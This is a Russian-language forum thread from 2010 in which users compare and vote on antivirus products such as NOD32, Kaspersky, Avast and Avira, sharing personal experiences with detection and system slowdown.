AVAST! Я считаю,что это не плохой сканер...!!!
megazoid94
23.01.2010, 19:37
Стоит уже год nod32 нет проблемм с компом,система не тормозит! регулярные обновления антивируса, всё гуд)
bilgeits
28.01.2010, 17:25
KIs 2010
Vlad_[oK]
28.01.2010, 18:13
NOD32 риальный....!
у меня стоит Авира, вполне устраивает.
Outpost Security Suite Pro поставил, не много не привычно, много чего блокирует, даже то что не надо. Пока ни чего серьёзного не случиться, о безопастности сказать не могу.
Сейчас уже стоит:Нода 32!!
По тому что:Аваст много чего пропускал после повторной проверки.
Вообще без антивируса =)
Пользовался 2 года НОД32 , месяца 3 назад быстродействие системы возросла) очень даже 50-100% - не знал что делать,облазил весь инет,проблему не решил( Переустановил систему - все Гуд . поставил Доктора , снес из-за простоты) что делать посоветуйте???
P.S. решил заново поставить нод32 - чет на так настроил - блоканул НАХ пол интернета...
http://s002.radikal.ru/i197/1002/59/4cce4fa8ed08.jpg (http://www.radikal.ru)
у меня стоит Авира, вполне устраивает.
Аналогично...
Предпочитаю Макафи.
1) Каспер неплох, но тормозит систему.
2)Др веб позорно не мог долечить конфикера, пропускал его как хотел.
ESET кто использует?
Я Его использую! Очень хороший антивирус, каспером раньше пользовался а сейчас только NOD32, На мой взгляд самый оптимальный антивирус!
Dr.Web Security Space вроде ещё не подводил меня
Кровавый
12.03.2010, 14:45
Проголосовал за NOD32. Раньше на винде юзал. Он меньше комп тормозит.
Под линем не вижу смысла юзать какой-либо.
FallenLord
12.03.2010, 15:00
самый первый антивирус, как и у многих был касперский.
потом долгое время пользовался пандой.
а сейчас окнчательно перешел на нод 32 и уже более 2 хлут на нем))))
FUTsin283
15.03.2010, 14:19
AVIRA-------------MUST DEAD/ каспер, веб, и прочая шняга не впечатлили. а в целом на вкус и цвет все фломастеры разные.
djazatik
15.03.2010, 14:26
Nod 32 2.5 =)))
DevilSymphony
16.03.2010, 16:49
Раньше был Каспер, теперь использую аваст. Работает нормально, загруженности на систему не наблюдаю, вирусы находит...+ "бесплатность" . Не жалуюсь
Мой выбор Kaspersky, правда необходимо периодически запускать проверку так-как бывает пробивается враг :)
вот простой вопрос
чем хорош нод и др. веб?
их везде обсирают, все статьи все там иследования и т.д.
сам юзаю аваст+комодо
вот простой вопрос
чем хорош нод и др. веб?
их везде обсирают, все статьи все там иследования и т.д.
сам юзаю аваст+комодо
незнаю,но мне нравится.
раньше авастом пользовался...
незнаю,но мне нравится.
раньше авастом пользовался...
плюсы и минусы распиши мне плиз
kiberdemon
17.03.2010, 22:13
kis 2010 антивир + фаервол
fenixelite
17.03.2010, 22:30
Kis 2010 + Outpost и все отлично ))
Mandriva Personal Firewall ;)
Решил попробовать McAfee, поставил VirusScan Enterprise.
Очень удобный, надежный, нетребовательный к ресурсам продукт.
Ну и их новая технология "Artemis" не перестает удивлять своей оперативностью.
ну что мне распишут плюсы и минусы?
ну что мне распишут плюсы и минусы?
Что тут расписывать. Попользуйся с полгода - узнаешь.
Avira - я исскренне верю, что у меня нету троянов
Что тут расписывать. Попользуйся с полгода - узнаешь.
нету времени
Тут не обсуждаем "какой антивирус лучше".
Раньше NOD , сейчас не юзаю антивирусы. Всегда со сниффером и дебагом.
mrExcluzive
04.04.2010, 17:38
кто нибудь скиньте ссылку с анти вирусником, у меня ноутбук и винда7 ))) для него какой норм будет??? спс... за рание
Jason Bourne
04.04.2010, 17:42
Вот (http://slynet.ru/antiviruses/) выбирай любой :)
mrExcluzive
05.04.2010, 11:06
Вот (http://slynet.ru/antiviruses/) выбирай любой :)
Спасибо помог) Скачал себе NoD32
MC_Bandit
05.04.2010, 20:52
Нод32 без б.
Пользуюсь более 3х лет. Проблем никогда не возникало.
Старпёры ничего не используют! А по факту - гумно ваш нод. Видит тока старые угрозы. Пройдитесь ради интереса после нода. Выделил бы Нортон, Доктора и Аваст. Остальное фтопку!
NoEasyWayOut
07.04.2010, 11:29
На ноуте стоял McAfee, просрочился, больше не обновляется, сижу без него уже годик, вообще без АВ и все нормально, просто знаю как вести себя в инете.
.antibiotic.
07.04.2010, 14:13
я касперкий юзаю.. все устраивает..
судя по голосованию,ачатовцы любители нода,касперыч уступает :confused:
юзаю касперский
юзаю касперский
Не далеко Нод ушел.
Юзаю NOD32 4 ветки. Сейчас занялся изучением ботнет сетей. В итоге в скором времени планирую перейти на касперыча. Поскольку как оказалось всякая гадость, как огня его боится с проактивной защитой которая работает в режиме ring0.
NOD 32 ОТЛИЧНЫЙ АНТИВИРУС
MC_Bandit
15.04.2010, 18:33
юзаю касперский
Нод на 20 голосов всего впереди.
Прежде чем пользоваться каким-либо анти-вирусным ПО ,прочитай хотябы что это ПО из себя представляет .ИМХО На сегодняшний день один из лучших анти-вирей ето KIS 09-10 + хороший брандмауэр, настроенный под свои нужды!!! User без анти-вирусного ПО либо недалекий человек либо самоуверенный д...л
Fantomas
26.04.2010, 03:17
Nod32+ZoneAlaram+ProcessExloer
Я Юзаю.
Canabioid
28.04.2010, 23:08
Касперский.
Выбирать даже не пришлось ,просто имею лицензионные диски с ключом.
аваст уже хня...... так как ключа на 5 версию нет.... тот что был заблочили....((
Стояли KIS, NOD, Dr.Web - не доволен ими вообще. KIS еще сносно, но систему грузит... И любимый kido он не лечит не фига. NOD это вообще решето, после него поставил NIS 2010. Нашел около 40 троянов. После сноса системы сразу же поставил NIS 2010, теперь все чисто. Плюс первый антивирь, который моментом указал на трояны в ZverCD :)
Кстати на работе развернул Symantec end-point, поставил сервер и с него развернул клиентскую часть на офисные машины. Удобно мониторить все угрозы и атаки происходящие в сети, заражения свел к нулю.
p.s. NIS 2010 кстати поставил после прочтения статьи в Хакере. Действенная штука оказался этот самый sonar :)
-=COPA=-
29.04.2010, 14:12
юзаю Nod32 - всё ок.
Раньше юзал Касперского,нод 32, сейчас Аваст.
black_berry
02.05.2010, 17:38
Раньше NOD32, сейчас AVG. Все устраивает.
переюзал все, имхо самый норм каспер, но в данный момент юзаю авиру, ибо лень переустановить. :(
||shake||
07.05.2010, 18:37
Думаю NOD32. Сколько им пользовался все ок! Надежный антивирус!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot